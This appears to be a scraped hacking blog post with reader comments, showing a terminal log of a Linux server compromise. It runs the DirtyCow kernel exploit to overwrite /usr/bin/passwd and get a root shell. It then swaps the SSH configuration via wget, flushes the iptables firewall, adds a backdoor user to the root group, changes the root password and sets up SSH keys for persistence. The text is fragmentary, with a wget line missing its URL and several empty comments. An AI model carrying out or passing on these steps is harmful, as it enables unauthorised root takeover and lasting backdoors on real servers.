su firefat
cd /etc/ssh/
rm sshd_config
wget -O sshd_config
iptables -F
service ssh restart
DirtyCow root privilege escalation
Backing up /usr/bin/passwd to /tmp/bak
Size of binary: 30768
Racing, this may take a while..
/usr/bin/passwd overwritten
Popping root shell.
Don’t forget to restore /tmp/bak
thread stopped
thread stopped
root@whmdaqu [/home/bugs/public_html/]#
root@server [/root]# /usr/sbin/useradd kontol -g root -d /home/kontol
/usr/sbin/useradd kontol -g root -d /home/kontol
root@server [/root]# passwd kontol
passwd root
root@server [/root]#
cd ~
ssh-keygen -t rsa
cp /root/.ssh/ /root/.ssh/authorized_keys
ssh root@localhost
root@server [~]# ssh root@localhost
ssh kontol@localhost
Attempting to create directory /root/perl5
root@server [~]#
Hersal Febrian says
saya mau belajar hack mulai dari dasar-dasar hingga yang lebih rumit. bisa di ajari.
ISN says
hi link sshd is broken. please fix link
chiaki says
miktambayong says